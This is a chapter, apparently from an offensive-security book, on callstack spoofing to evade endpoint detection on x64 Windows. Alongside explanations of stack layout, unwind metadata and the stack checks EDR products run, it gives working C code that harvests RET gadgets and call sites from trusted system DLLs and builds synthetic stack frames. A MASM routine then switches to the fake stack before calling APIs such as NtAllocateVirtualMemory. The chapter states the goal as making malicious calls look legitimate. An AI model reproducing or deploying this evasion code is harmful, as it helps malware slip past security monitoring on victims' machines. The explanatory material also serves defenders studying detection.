Chapter 19: Callstack Spoofing

The Forensics of Function Calls

Modern EDR systems have evolved beyond simple API hooking. They now examine the call stack at the moment of sensitive API invocations, asking a crucial question: "Where did this call originate?" When NtAllocateVirtualMemory is called directly from an unknown memory region rather than through the expected kernel32.dll → kernelbase.dll → ntdll.dll chain, alarm bells ring. Callstack spoofing addresses this by constructing fake stack frames that make malicious calls appear to originate from legitimate code paths.

Understanding callstack analysis and spoofing requires deep knowledge of x64 calling conventions, stack frame layout, and the Windows exception handling infrastructure. This chapter explores how security products analyze stacks, why certain patterns trigger detection, and the techniques used to construct convincing false call histories.

THE CALLSTACK ANALYSIS PROBLEM
==============================

SUSPICIOUS CALL (Detected):
┌─────────────────────────────────────────────────────────────────────┐
│                                                                     │
│  NtAllocateVirtualMemory called from:                              │
│                                                                     │
│  ┌───────────────────────────────────────────────────────────┐     │
│  │ Stack Frame 0: ntdll!NtAllocateVirtualMemory              │     │
│  │   Return Address: 0x00000001400012AB  ◄── UNKNOWN MODULE! │     │
│  ├───────────────────────────────────────────────────────────┤     │
│  │ Stack Frame 1: ??? (0x00000001400012AB)                   │     │
│  │   Return Address: 0x0000000140001000  ◄── RWX MEMORY!    │     │
│  ├───────────────────────────────────────────────────────────┤     │
│  │ Stack Frame 2: ???                                        │     │
│  │   Return Address: (invalid)           ◄── BROKEN CHAIN!   │     │
│  └───────────────────────────────────────────────────────────┘     │
│                                                                     │
│  EDR Analysis: "Direct syscall from unbacked memory"                │
│  Result: BLOCKED / ALERT                                            │
│                                                                     │
└─────────────────────────────────────────────────────────────────────┘

LEGITIMATE CALL (Expected):
┌─────────────────────────────────────────────────────────────────────┐
│                                                                     │
│  NtAllocateVirtualMemory called from:                              │
│                                                                     │
│  ┌───────────────────────────────────────────────────────────┐     │
│  │ Stack Frame 0: ntdll!NtAllocateVirtualMemory              │     │
│  │   Return Address: kernelbase+0x1A2B3 ◄── Known offset    │     │
│  ├───────────────────────────────────────────────────────────┤     │
│  │ Stack Frame 1: kernelbase!VirtualAllocEx                  │     │
│  │   Return Address: kernel32+0x5C7D2  ◄── Expected chain    │     │
│  ├───────────────────────────────────────────────────────────┤     │
│  │ Stack Frame 2: kernel32!VirtualAlloc                      │     │
│  │   Return Address: app.exe+0x12AB    ◄── Signed module     │     │
│  └───────────────────────────────────────────────────────────┘     │
│                                                                     │
│  EDR Analysis: "Normal API call chain"                              │
│  Result: ALLOWED                                                    │
│                                                                     │
└─────────────────────────────────────────────────────────────────────┘

Part 1: Understanding x64 Stack Architecture

Before we can spoof call stacks, we must thoroughly understand how they're constructed. The x64 calling convention defines specific rules for parameter passing, stack alignment, and frame organization.

The x64 Calling Convention

On 64-bit Windows, the first four integer/pointer arguments are passed in registers (RCX, RDX, R8, R9), and any additional arguments go on the stack. The stack must be 16-byte aligned at every CALL, and the caller must reserve 32 bytes of "shadow space" (home space) just above the return address, which the callee may use to spill its register parameters.

x64 STACK FRAME ANATOMY
=======================

When Function A calls Function B:

High Memory
┌─────────────────────────────────────────────────────────────────┐
│                                                                 │
│  Function A's Stack Frame                                       │
│  ├── A's saved non-volatile registers (if any)                  │
│  ├── A's local variables                                        │
│  ├── ...more parameters...                                      │
│  ├── Parameter 6 (if exists)              [RSP+0x30]            │
│  ├── Parameter 5 (if exists)              [RSP+0x28]            │
│  ├── Shadow space for R9                  [RSP+0x20]            │
│  ├── Shadow space for R8                  [RSP+0x18]            │
│  ├── Shadow space for RDX                 [RSP+0x10]            │
│  ├── Shadow space for RCX                 [RSP+0x08]            │
│  │   ▲                                                          │
│  │   [Before CALL, RSP points at RCX's slot, 16-byte aligned]   │
│                                                                 │
├─────────────────────────────────────────────────────────────────┤
│  CALL instruction executes → pushes return address              │
├─────────────────────────────────────────────────────────────────┤
│  Return Address (8 bytes)                 [RSP]     ◄── Key!    │
├─────────────────────────────────────────────────────────────────┤
│                                                                 │
│  Function B's Stack Frame (after prologue)                      │
│  ├── Saved RBP (if frame pointer used)    [RSP-0x08]            │
│  ├── Saved non-volatile registers                               │
│  ├── Local variables                                            │
│  ├── ...                                                        │
│                                                                 │
└─────────────────────────────────────────────────────────────────┘
Low Memory

Bracketed offsets are relative to RSP immediately after the CALL.


Key Points:
• Return address is at [RSP] immediately after CALL
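• Shadow space (32 bytes) is reserved by the caller for every call, even when the callee takes fewer than four arguments
• Stack must be 16-byte aligned BEFORE the call, so RSP mod 16 == 8 on entry to the callee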
• RBP may or may not be used as frame pointer
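The alignment and shadow-space rules above reduce to small pieces of arithmetic. The portable C sketch below (ArgOffsetAtEntry and FixedAllocation are illustrative names, not Windows APIs) computes where an argument lives relative to RSP on entry to the callee, and how many bytes a prologue must subtract so that RSP is 16-byte aligned again at the function's own calls. It assumes fixed-size locals and ignores alloca, over-aligned locals, and stack probes.

```c
#include <stddef.h>

/* Offset of argument n (1-based) from RSP on entry to the callee, when
 * [RSP] holds the return address. Arguments 1-4 arrive in RCX, RDX, R8, R9
 * but each still owns an 8-byte shadow slot; argument 5 onward sit directly
 * above the shadow space. */
size_t ArgOffsetAtEntry(unsigned n) {
    return 8u * n;  /* arg1 -> 0x08, arg4 -> 0x20, arg5 -> 0x28 */
}

/* Bytes a prologue must subtract from RSP ("sub rsp, N") after its pushes
 * so that RSP is 16-byte aligned again at this function's own CALLs.
 *   pushes      : non-volatile registers pushed by the prologue
 *   localBytes  : bytes of local storage
 *   maxCallArgs : most arguments passed by any call this function makes;
 *                 at least 4 slots (the shadow space) are always reserved */
size_t FixedAllocation(unsigned pushes, size_t localBytes, unsigned maxCallArgs) {
    size_t outgoing = 8u * (maxCallArgs < 4 ? 4u : maxCallArgs);
    size_t alloc = localBytes + outgoing;
    /* On entry RSP % 16 == 8 because of the return address; each push adds 8 */
    size_t used = 8u + 8u * pushes + alloc;
    if (used % 16 != 0)
        alloc += 16 - (used % 16);
    return alloc;
}
```

With no pushes, no locals, and only register arguments, FixedAllocation(0, 0, 4) yields 0x28, the familiar `sub rsp, 28h` prologue in MSVC output; after a single `push rbx` the same function needs only 0x20.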

The RBP Frame Pointer Chain

Traditional stack walking relies on the frame pointer (RBP) forming a linked list. In the classic `push rbp; mov rbp, rsp` prologue, [RBP] holds the caller's saved RBP and [RBP+8] holds the return address, so following the saved RBP values enumerates every caller.

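#include <windows.h>
#include <stdio.h>

// Manual stack walk using the RBP chain.
// Caveat: MSVC x64 code usually does not keep an RBP chain, so this walk is
// only meaningful for code built with frame pointers.
void WalkStackUsingRBP(void) {
    CONTEXT ctx;
    ULONG_PTR ulLow = 0, ulHigh = 0;

    // Capture our own register state; ctx.Rbp is this function's RBP
    RtlCaptureContext(&ctx);
    GetCurrentThreadStackLimits(&ulLow, &ulHigh);

    PBYTE pCurrentRbp = (PBYTE)ctx.Rbp;

    printf("Stack Walk via RBP Chain:\n");

    int nFrame = 0;
    // Stop once RBP no longer points into this thread's stack
    while (pCurrentRbp &&
           (ULONG_PTR)pCurrentRbp >= ulLow &&
           (ULONG_PTR)pCurrentRbp + 16 <= ulHigh &&
           nFrame < 20) {
        // At each frame:
        // [RBP]     = caller's saved RBP (next link in the chain)
        // [RBP+8]   = return address into the caller
        PBYTE pPrevRbp = *(PBYTE*)pCurrentRbp;
        PVOID pRetAddr = *(PVOID*)(pCurrentRbp + 8);

        printf("  Frame %d: RBP=0x%p, Return=0x%p\n",
            nFrame, (PVOID)pCurrentRbp, pRetAddr);

        // A valid chain only moves toward the stack base
        if (pPrevRbp <= pCurrentRbp) break;

        pCurrentRbp = pPrevRbp;
        nFrame++;
    }
}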

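However, most x64 code compiled by MSVC does not establish a frame pointer at all: RBP is treated as an ordinary non-volatile register (the x64 counterpart of x86 Frame Pointer Omission, FPO). Stack walkers cannot follow an RBP chain through such functions and rely on metadata instead.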

Part 2: Windows Exception Handling and Stack Walking

On x64, Windows does not rely on frame pointers for stack walking. Instead, it uses table-based metadata stored in the PE file that describes how each function's prologue changed the stack.

RUNTIME_FUNCTION and UNWIND_INFO

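Every function that allocates stack space, calls other functions, or saves non-volatile registers (that is, every non-leaf function) has a RUNTIME_FUNCTION entry in the .pdata section. The entry records where the function starts and ends (EndAddress is exclusive) and points to an UNWIND_INFO structure describing how to undo the prologue.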

EXCEPTION HANDLING METADATA
===========================

.pdata Section (RUNTIME_FUNCTION array):
┌─────────────────────────────────────────────────────────────────┐
│                                                                 │
│  RUNTIME_FUNCTION Entry:                                        │
│  ┌─────────────────────────────────────────────────────────┐   │
│  │ BeginAddress  (DWORD) ─► RVA of function start          │   │
│  │ EndAddress    (DWORD) ─► RVA of function end            │   │
│  │ UnwindData    (DWORD) ─► RVA of UNWIND_INFO             │   │
│  └─────────────────────────────────────────────────────────┘   │
│                                                                 │
│  Example:                                                       │
│  { 0x00001000, 0x00001500, 0x00008000 }                        │
│                                                                 │
│  Means: Function at RVA 0x1000-0x1500, unwind at 0x8000        │
│                                                                 │
└─────────────────────────────────────────────────────────────────┘
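RtlLookupFunctionEntry performs this lookup for loaded images. Because x64 .pdata entries are sorted by BeginAddress, a binary search over one image's table is enough to model it. The sketch below uses a local struct mirroring the three-DWORD layout shown above and a hypothetical LookupRuntimeFunction helper; it ignores dynamic function tables and chained unwind info.

```c
#include <stddef.h>
#include <stdint.h>

/* Local mirror of the x64 RUNTIME_FUNCTION layout: three 32-bit RVAs.
 * EndAddress is exclusive. */
typedef struct {
    uint32_t BeginAddress;
    uint32_t EndAddress;
    uint32_t UnwindData;
} RuntimeFunction;

/* Return the entry whose [BeginAddress, EndAddress) range contains rva,
 * or NULL if none does (e.g. the address is inside a leaf function or
 * outside the image's code). The table must be sorted by BeginAddress. */
const RuntimeFunction* LookupRuntimeFunction(const RuntimeFunction* table,
                                             size_t count, uint32_t rva) {
    size_t lo = 0, hi = count;
    while (lo < hi) {
        size_t mid = lo + (hi - lo) / 2;
        if (rva < table[mid].BeginAddress)
            hi = mid;                 /* target lies in an earlier entry */
        else if (rva >= table[mid].EndAddress)
            lo = mid + 1;             /* target lies in a later entry */
        else
            return &table[mid];       /* Begin <= rva < End */
    }
    return NULL;
}
```

With the example entry above, any RVA from 0x1000 through 0x14FF resolves to it, while 0x1500 itself does not.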

UNWIND_INFO Structure:
┌─────────────────────────────────────────────────────────────────┐
│                                                                 │
│  ┌─────────────────────────────────────────────────────────┐   │
│  │ Version (3 bits)        │ Usually 1                     │   │
│  │ Flags (5 bits)          │ UNW_FLAG_* values             │   │
│  │ SizeOfProlog (byte)     │ Size of function prologue     │   │
│  │ CountOfCodes (byte)     │ Number of unwind codes        │   │
│  │ FrameRegister (4 bits)  │ Which register is frame ptr   │   │
│  │ FrameOffset (4 bits)    │ RSP offset to frame (x16)     │   │
│  │ UnwindCode[n]           │ Array of unwind operations    │   │
│  └─────────────────────────────────────────────────────────┘   │
│                                                                 │
│  Unwind codes describe stack operations:                        │
│  • UWOP_PUSH_NONVOL    - Register was pushed                   │
│  • UWOP_ALLOC_LARGE    - Large stack allocation                │
│  • UWOP_ALLOC_SMALL    - Small stack allocation                │
│  • UWOP_SET_FPREG      - Frame pointer established             │
│  • etc.                                                         │
│                                                                 │
└─────────────────────────────────────────────────────────────────┘
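To make the bit layout and unwind codes concrete, here is a portable sketch that decodes the packed header and sums the stack adjustments recorded by the unwind codes. That sum is what an unwinder needs to find a frame's return address. The field positions and UWOP values follow Microsoft's published x64 exception-handling documentation; DecodeUnwindHeader, FixedFrameSize, and the test bytes are illustrative. It deliberately ignores chained unwind info (UNW_FLAG_CHAININFO), dynamic allocations made after the prologue, and any operation it does not recognize (such as UWOP_PUSH_MACHFRAME).

```c
#include <stdint.h>

/* UWOP_* values from the documented x64 UNWIND_CODE format */
enum {
    UWOP_PUSH_NONVOL = 0, UWOP_ALLOC_LARGE = 1, UWOP_ALLOC_SMALL = 2,
    UWOP_SET_FPREG = 3, UWOP_SAVE_NONVOL = 4, UWOP_SAVE_NONVOL_FAR = 5,
    UWOP_SAVE_XMM128 = 8, UWOP_SAVE_XMM128_FAR = 9
};

typedef struct {
    unsigned Version, Flags, SizeOfProlog, CountOfCodes;
    unsigned FrameRegister, FrameOffset;
} UnwindHeader;

/* Decode the packed 4-byte UNWIND_INFO header */
UnwindHeader DecodeUnwindHeader(const uint8_t* p) {
    UnwindHeader h;
    h.Version       = p[0] & 0x07;       /* low 3 bits of byte 0  */
    h.Flags         = p[0] >> 3;         /* high 5 bits of byte 0 */
    h.SizeOfProlog  = p[1];
    h.CountOfCodes  = p[2];              /* counts 16-bit slots   */
    h.FrameRegister = p[3] & 0x0F;       /* low nibble of byte 3  */
    h.FrameOffset   = (p[3] >> 4) * 16u; /* high nibble, scaled by 16 */
    return h;
}

/* Read 16-bit unwind slot idx (little-endian) */
static unsigned Slot(const uint8_t* codes, unsigned idx) {
    return (unsigned)codes[2 * idx] | ((unsigned)codes[2 * idx + 1] << 8);
}

/* Bytes the prologue moved RSP by (pushes plus allocations), i.e. the
 * distance from RSP after the prologue up to the return address. Each slot
 * holds CodeOffset (byte 0) and UnwindOp/OpInfo (low/high nibble of byte 1);
 * some operations consume extra slots. Returns -1 for unhandled input. */
int64_t FixedFrameSize(const uint8_t* info) {
    UnwindHeader h = DecodeUnwindHeader(info);
    const uint8_t* codes = info + 4;
    int64_t size = 0;

    for (unsigned i = 0; i < h.CountOfCodes; i++) {
        unsigned op = codes[2 * i + 1] & 0x0F;
        unsigned opInfo = codes[2 * i + 1] >> 4;
        switch (op) {
        case UWOP_PUSH_NONVOL: size += 8; break;
        case UWOP_ALLOC_SMALL: size += 8 * opInfo + 8; break;
        case UWOP_ALLOC_LARGE:
            if (opInfo == 0 && i + 1 < h.CountOfCodes) {
                size += 8 * (int64_t)Slot(codes, i + 1);     /* size / 8 */
                i += 1;
            } else if (opInfo == 1 && i + 2 < h.CountOfCodes) {
                size += (int64_t)Slot(codes, i + 1) |
                        ((int64_t)Slot(codes, i + 2) << 16); /* raw 32-bit size */
                i += 2;
            } else {
                return -1;
            }
            break;
        case UWOP_SET_FPREG: break;      /* does not move RSP by itself */
        case UWOP_SAVE_NONVOL: case UWOP_SAVE_XMM128: i += 1; break;
        case UWOP_SAVE_NONVOL_FAR: case UWOP_SAVE_XMM128_FAR: i += 2; break;
        default: return -1;
        }
    }
    return size;
}
```

For a `push rbx; sub rsp, 20h` prologue the codes (listed in reverse prologue order) sum to 0x28, so RSP after the prologue plus 0x28 is the slot holding the return address.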

RtlVirtualUnwind: The Stack Walking Engine

Windows walks the stack one frame at a time. Given the current instruction pointer, RtlLookupFunctionEntry finds the covering RUNTIME_FUNCTION; RtlVirtualUnwind then decodes its UNWIND_INFO and updates a context (register state) to the caller's state.

#include <windows.h>
#include <stdio.h>

// Demonstrate RtlVirtualUnwind usage
void WalkStackProperly(PCONTEXT pContext) {
    CONTEXT ctx = *pContext;
    KNONVOLATILE_CONTEXT_POINTERS nvCtx = { 0 };

    printf("Stack Walk via RtlVirtualUnwind:\n");

    int nFrame = 0;
    while (ctx.Rip && nFrame < 20) {
        // Lookup RUNTIME_FUNCTION for current RIP
        DWORD64 dwImageBase = 0;
        PRUNTIME_FUNCTION pRtFunc = RtlLookupFunctionEntry(
            ctx.Rip,
            &dwImageBase,
            NULL  // Optional UNWIND_HISTORY_TABLE (lookup cache)
        );

        printf("  Frame %d: RIP=0x%llX", nFrame, ctx.Rip);

        if (pRtFunc) {
            // Has unwind info - use it
            PVOID pHandlerData = NULL;
            DWORD64 dwEstablisherFrame = 0;

            RtlVirtualUnwind(
                UNW_FLAG_NHANDLER,
                dwImageBase,
                ctx.Rip,
                pRtFunc,
                &ctx,
                &pHandlerData,
                &dwEstablisherFrame,
                &nvCtx
            );

            printf(" (has RUNTIME_FUNCTION)\n");
        }
        else {
            // Leaf function - return address is at [RSP]
            ctx.Rip = *(PDWORD64)ctx.Rsp;
            ctx.Rsp += 8;
            printf(" (leaf function)\n");
        }

        nFrame++;
    }
}

Part 3: How EDRs Analyze Call Stacks

Understanding what EDRs look for helps us understand what we need to fake. Modern EDRs perform sophisticated stack analysis during sensitive operations.

Detection Criteria

EDR STACK ANALYSIS CHECKLIST
============================

For each stack frame, EDRs typically verify:

1. MODULE BACKING
   ┌────────────────────────────────────────────────────────────┐
   │ • Is the return address within a loaded module?            │
   │ • Is that module signed? Trusted?                         │
   │ • Is it mapped from disk (not private memory)?            │
   └────────────────────────────────────────────────────────────┘
   Detection: Direct syscall from shellcode → ALERT

2. VALID CHAIN
   ┌────────────────────────────────────────────────────────────┐
   │ • Does the RBP chain form a valid linked list?            │
   │ • Are all RBP values within the thread's stack?           │
   │ • Does the chain reach a reasonable end?                   │
   └────────────────────────────────────────────────────────────┘
   Detection: Broken chain or circular reference → ALERT

3. RUNTIME_FUNCTION ENTRIES
   ┌────────────────────────────────────────────────────────────┐
   │ • Does each return address have a RUNTIME_FUNCTION?       │
   │ • Exception: the current RIP may be in a leaf function     │
   │ • Exception: Dynamic code (JIT, trampolines)              │
   └────────────────────────────────────────────────────────────┘
   Detection: Return to address without metadata → SUSPICIOUS

4. RETURN ADDRESS VALIDITY
   ┌────────────────────────────────────────────────────────────┐
   │ • Is the return address right after a CALL instruction?   │
   │ • Does it make sense given the function boundaries?       │
   │ • Is it inside a known function?                          │
   └────────────────────────────────────────────────────────────┘
   Detection: Return to middle of instruction → ALERT

5. EXPECTED CALL PATTERNS
   ┌────────────────────────────────────────────────────────────┐
   │ • Does the chain match known API patterns?                │
   │ • e.g., NtAllocateVirtualMemory should be called via      │
   │   VirtualAlloc → VirtualAllocEx → NtAllocateVirtual...    │
   └────────────────────────────────────────────────────────────┘
   Detection: Unusual caller for syscall → SUSPICIOUS
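Check 4 can be approximated without a full disassembler by testing whether the bytes immediately before a return address form a common CALL encoding. The sketch below (PrecededByCall is a hypothetical helper) works on any byte buffer, for example a copy of a module's .text section, and only recognizes the encodings listed in its comments.

```c
#include <stddef.h>
#include <stdint.h>

/* Heuristic for check 4: do the bytes just before a return address end
 * with a CALL? `retAddr` points at the return address inside a buffer of
 * code; `avail` is how many bytes before it are readable. Encodings tested:
 *   E8 rel32          5 bytes  direct near call
 *   FF 15 disp32      6 bytes  call [rip+disp32] (e.g. through the IAT)
 *   FF D0..FF D7      2 bytes  call rax..rdi; REX-prefixed forms such as
 *                              41 FF D3 (call r11) end in the same 2 bytes
 * Forms like call [reg+disp8] are not covered. Because x86 decoding is not
 * self-synchronizing, a match is only evidence, not proof. */
int PrecededByCall(const uint8_t* retAddr, size_t avail) {
    if (avail >= 5 && retAddr[-5] == 0xE8)
        return 1;
    if (avail >= 6 && retAddr[-6] == 0xFF && retAddr[-5] == 0x15)
        return 1;
    /* ModRM 0xD0-0xD7: mod = 11, reg = 2 (the CALL extension), r/m = register */
    if (avail >= 2 && retAddr[-2] == 0xFF && (retAddr[-1] & 0xF8) == 0xD0)
        return 1;
    return 0;
}
```

A bare RET gadget found by scanning for 0xC3 usually fails this test, which is why the detection section later checks for it.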

Stack Capture Methods

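EDRs typically capture stacks from kernel callbacks or through user-mode instrumentation. The conceptual kernel-side sketch below copies raw user-stack contents; OnSyscallEntry, GetCurrentTrapFrame, and AnalyzeStackFrames are placeholders rather than real kernel APIs:

// Kernel-mode stack capture (simplified concept; OnSyscallEntry,
// GetCurrentTrapFrame and AnalyzeStackFrames are hypothetical placeholders)
VOID OnSyscallEntry(ULONG ulSyscallNumber) {
    KTRAP_FRAME* pTrapFrame = GetCurrentTrapFrame();

    // Copy the top 32 qwords of the user-mode stack, starting at the saved RSP
    PVOID pUserStack[32] = { 0 };
    ULONG ulCaptured = 0;

    __try {
        ProbeForRead((PVOID)pTrapFrame->Rsp, sizeof(pUserStack), sizeof(PVOID));

        for (ULONG i = 0; i < 32; i++) {
            pUserStack[i] = *(PVOID*)(pTrapFrame->Rsp + i * 8);
            ulCaptured++;
        }
    }
    __except(EXCEPTION_EXECUTE_HANDLER) {
        // User stack unreadable; analyze whatever was captured
    }

    // These are raw qwords, not frames: the analyzer still has to decide
    // which values are return addresses (by unwinding or module lookup)
    AnalyzeStackFrames(pUserStack, ulCaptured, ulSyscallNumber);
}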

Part 4: Basic Callstack Spoofing

The simplest spoofing technique replaces the return address with an address inside a legitimate module. When the EDR examines the stack, it sees a return to known code rather than our malicious module.

Finding RET Gadgets

A "gadget" is a small code sequence we can use as a fake return target. The simplest is just a RET instruction (0xC3). When execution "returns" to this gadget, it immediately returns again, continuing the chain.

#include <windows.h>

// Find a RET instruction in a legitimate module
PVOID FindRetGadget(HMODULE hModule) {
    PBYTE pBase = (PBYTE)hModule;

    // Get module bounds from PE headers
    PIMAGE_DOS_HEADER pDos = (PIMAGE_DOS_HEADER)pBase;
    PIMAGE_NT_HEADERS pNt = (PIMAGE_NT_HEADERS)(pBase + pDos->e_lfanew);
    SIZE_T sSize = pNt->OptionalHeader.SizeOfImage;

    // Search for RET (0xC3) instruction
    // Search in .text section for executable code
    PIMAGE_SECTION_HEADER pSection = IMAGE_FIRST_SECTION(pNt);
    for (WORD i = 0; i < pNt->FileHeader.NumberOfSections; i++) {
        if (pSection[i].Characteristics & IMAGE_SCN_CNT_CODE) {
            PBYTE pCode = pBase + pSection[i].VirtualAddress;
            SIZE_T sCodeSize = pSection[i].Misc.VirtualSize;

            for (SIZE_T j = 0; j < sCodeSize; j++) {
                if (pCode[j] == 0xC3) {
                    return &pCode[j];
                }
            }
        }
    }

    return NULL;
}

// Find "pop rbp; ret" gadget (0x5D 0xC3)
// Useful for maintaining RBP chain
PVOID FindPopRbpRetGadget(HMODULE hModule) {
    PBYTE pBase = (PBYTE)hModule;

    PIMAGE_DOS_HEADER pDos = (PIMAGE_DOS_HEADER)pBase;
    PIMAGE_NT_HEADERS pNt = (PIMAGE_NT_HEADERS)(pBase + pDos->e_lfanew);

    PIMAGE_SECTION_HEADER pSection = IMAGE_FIRST_SECTION(pNt);
    for (WORD i = 0; i < pNt->FileHeader.NumberOfSections; i++) {
        if (pSection[i].Characteristics & IMAGE_SCN_CNT_CODE) {
            PBYTE pCode = pBase + pSection[i].VirtualAddress;
            SIZE_T sCodeSize = pSection[i].Misc.VirtualSize;

            for (SIZE_T j = 0; j < sCodeSize - 1; j++) {
                if (pCode[j] == 0x5D && pCode[j + 1] == 0xC3) {
                    return &pCode[j];
                }
            }
        }
    }

    return NULL;
}

Building Fake Return Addresses

For more convincing spoofing, we find addresses that look like real return addresses—locations immediately after CALL instructions within legitimate functions.

#include <windows.h>

typedef struct _CALL_SITE_INFO {
    PVOID pAddress;       // Address right after CALL instruction
    PVOID pFunctionStart; // Start of containing function
    SIZE_T sOffset;       // Offset within function
} CALL_SITE_INFO, *PCALL_SITE_INFO;

// Find addresses that follow CALL instructions
// These look like legitimate return addresses
DWORD FindCallSites(
    HMODULE hModule,
    PCALL_SITE_INFO pSites,
    DWORD dwMaxSites
) {
    PBYTE pBase = (PBYTE)hModule;

    PIMAGE_DOS_HEADER pDos = (PIMAGE_DOS_HEADER)pBase;
    PIMAGE_NT_HEADERS pNt = (PIMAGE_NT_HEADERS)(pBase + pDos->e_lfanew);

    // Find .text section
    PIMAGE_SECTION_HEADER pSection = IMAGE_FIRST_SECTION(pNt);
    PBYTE pText = NULL;
    SIZE_T sTextSize = 0;

    for (WORD i = 0; i < pNt->FileHeader.NumberOfSections; i++) {
        if (strcmp((char*)pSection[i].Name, ".text") == 0) {
            pText = pBase + pSection[i].VirtualAddress;
            sTextSize = pSection[i].Misc.VirtualSize;
            break;
        }
    }

    if (!pText) return 0;

    DWORD dwFound = 0;

    // Search for CALL instructions
    for (SIZE_T i = 0; i < sTextSize - 5 && dwFound < dwMaxSites; i++) {
        // E8 xx xx xx xx = CALL rel32 (relative near call)
        if (pText[i] == 0xE8) {
            // The byte after CALL is where execution returns
            PVOID pReturnSite = &pText[i + 5];

            pSites[dwFound].pAddress = pReturnSite;
            pSites[dwFound].sOffset = i + 5;
            dwFound++;
        }
        // FF 15 xx xx xx xx = CALL [rip+rel32] (indirect call via memory)
        else if (pText[i] == 0xFF && pText[i + 1] == 0x15) {
            PVOID pReturnSite = &pText[i + 6];

            pSites[dwFound].pAddress = pReturnSite;
            pSites[dwFound].sOffset = i + 6;
            dwFound++;
        }
    }

    return dwFound;
}

Part 5: Synthetic Stack Frame Construction

More sophisticated spoofing builds complete fake stack frames with a consistent RBP chain and shadow space. The goal is to survive stack walkers that follow the frame-pointer chain, not just a check of the topmost return address.

Frame Structure

#include <windows.h>

// A synthetic stack frame
typedef struct _SYNTHETIC_FRAME {
    PVOID pSavedRbp;      // Points to next frame's saved RBP
    PVOID pReturnAddress; // Fake return address in legitimate module
    BYTE bShadowSpace[32];// Shadow space (required by calling convention)
} SYNTHETIC_FRAME, *PSYNTHETIC_FRAME;

// Collection of frames forming a fake call stack
typedef struct _SPOOF_STACK {
    BYTE bMemory[4096];        // Memory for synthetic frames
    PVOID pStackTop;           // Top of our synthetic stack
    DWORD dwFrameCount;        // Number of frames
    PVOID pRealReturnAddress;  // Where to actually return
} SPOOF_STACK, *PSPOOF_STACK;

Building the Synthetic Stack

#include <windows.h>

typedef struct _GADGET_COLLECTION {
    PVOID pGadgets[32];
    char szModules[32][64];
    DWORD dwCount;
} GADGET_COLLECTION, *PGADGET_COLLECTION;

// Collect gadgets from multiple trusted modules
BOOL CollectGadgets(PGADGET_COLLECTION pColl) {
    const wchar_t* wszModules[] = {
        L"kernel32.dll",
        L"kernelbase.dll",
        L"ntdll.dll",
        L"user32.dll",
        L"advapi32.dll",
        NULL
    };

    pColl->dwCount = 0;

    for (int i = 0; wszModules[i] && pColl->dwCount < 32; i++) {
        HMODULE hMod = GetModuleHandleW(wszModules[i]);
        if (!hMod) hMod = LoadLibraryW(wszModules[i]);
        if (!hMod) continue;

        PVOID pGadget = FindRetGadget(hMod);
        if (pGadget) {
            pColl->pGadgets[pColl->dwCount] = pGadget;
            WideCharToMultiByte(CP_ACP, 0, wszModules[i], -1,
                pColl->szModules[pColl->dwCount], 64, NULL, NULL);
            pColl->dwCount++;
        }
    }

    return pColl->dwCount > 0;
}

// Build a synthetic stack with specified depth
PVOID BuildSyntheticStack(
    PSPOOF_STACK pStack,
    PGADGET_COLLECTION pGadgets,
    PVOID pRealReturn,
    DWORD dwFrameDepth
) {
    // Start at top of our stack memory
    PBYTE pCurrent = pStack->bMemory + sizeof(pStack->bMemory);

    // Reserve space and align to 16 bytes
    pCurrent -= 256;
    pCurrent = (PBYTE)((ULONG_PTR)pCurrent & ~0xF);

    // Build frames from bottom (oldest) to top (newest)
    PVOID pNextRbp = NULL;

    for (DWORD i = 0; i < dwFrameDepth; i++) {
        // Select a gadget (vary by frame for realism)
        PVOID pGadget = pGadgets->pGadgets[i % pGadgets->dwCount];

        // Reserve shadow space
        pCurrent -= 32;

        // Return address
        pCurrent -= 8;
        *(PVOID*)pCurrent = (i == 0) ? pRealReturn : pGadget;

        // Saved RBP (points to next frame's RBP location)
        pCurrent -= 8;
        *(PVOID*)pCurrent = pNextRbp;

        pNextRbp = pCurrent;  // This frame's RBP will be previous frame's saved RBP
    }

    pStack->pStackTop = pCurrent;
    pStack->pRealReturnAddress = pRealReturn;
    pStack->dwFrameCount = dwFrameDepth;

    return pCurrent;
}

Part 6: Assembly Implementation

Using the spoofed stack requires assembly code to switch stacks and make the call. C code cannot safely change RSP and RBP around a function call, and MSVC does not support inline assembly when targeting x64, so the routine lives in a separate MASM source file.

x64 MASM Implementation

; spoofcall.asm - x64 MASM assembly for stack spoofing

.code

; GetReturnAddress - return the address this routine was called from
; Returns: RAX = the return address pushed by the CALL (a location in the caller)
GetReturnAddress PROC
    mov rax, [rsp]          ; Return address is at [RSP]
    ret
GetReturnAddress ENDP


; SpoofedCall - Make a call with a spoofed stack
;
; Parameters:
;   RCX = pSpoofStack      - Pointer to SPOOF_STACK structure
;   RDX = pTargetFunction  - Function to call
;   R8  = pArg1            - First argument to target
;   R9  = pArg2            - Second argument to target
;   [RSP+0x28] = pArg3     - Third argument
;   [RSP+0x30] = pArg4     - Fourth argument
;
; The SPOOF_STACK structure:
;   +0x000: Memory buffer for synthetic stack
;   +0x1000: pStackTop (PVOID)
;   +0x1008: dwFrameCount (DWORD)
;   +0x1010: pRealReturnAddress (PVOID)

SPOOF_STACK_TOP_OFFSET      EQU 1000h
SPOOF_REAL_RETURN_OFFSET    EQU 1010h

SpoofedCall PROC
    ; Save non-volatile registers
    push rbx
    push rsi
    push rdi
    push rbp
    push r12
    push r13
    push r14
    push r15

    ; Save parameters
    mov r12, rcx            ; pSpoofStack
    mov r13, rdx            ; pTargetFunction
    mov r14, r8             ; pArg1
    mov r15, r9             ; pArg2

    ; Save original stack
    mov rbx, rsp
    mov rsi, rbp

    ; Load spoofed stack pointer
    mov rsp, [r12 + SPOOF_STACK_TOP_OFFSET]

    ; Set RBP to point to first synthetic frame
    mov rbp, rsp

    ; Allocate shadow space for target call
    sub rsp, 20h

    ; Setup arguments for target function
    mov rcx, r14            ; Arg1
    mov rdx, r15            ; Arg2
    mov r8, [rbx + 68h]     ; Arg3 (from original stack, accounting for pushes)
    mov r9, [rbx + 70h]     ; Arg4

    ; Call target function
    ; EDR will see our spoofed stack when it examines!
    call r13

    ; Save return value
    mov r12, rax

    ; Restore original stack
    mov rsp, rbx
    mov rbp, rsi

    ; Return value
    mov rax, r12

    ; Restore non-volatile registers
    pop r15
    pop r14
    pop r13
    pop r12
    pop rbp
    pop rdi
    pop rsi
    pop rbx

    ret
SpoofedCall ENDP

END

C Wrapper

#include <windows.h>

// Assembly function declaration
extern NTSTATUS SpoofedCall(
    PSPOOF_STACK pSpoofStack,
    PVOID pTargetFunction,
    PVOID pArg1,
    PVOID pArg2,
    PVOID pArg3,
    PVOID pArg4
);

// High-level wrapper for common APIs
NTSTATUS SpoofedNtAllocateVirtualMemory(
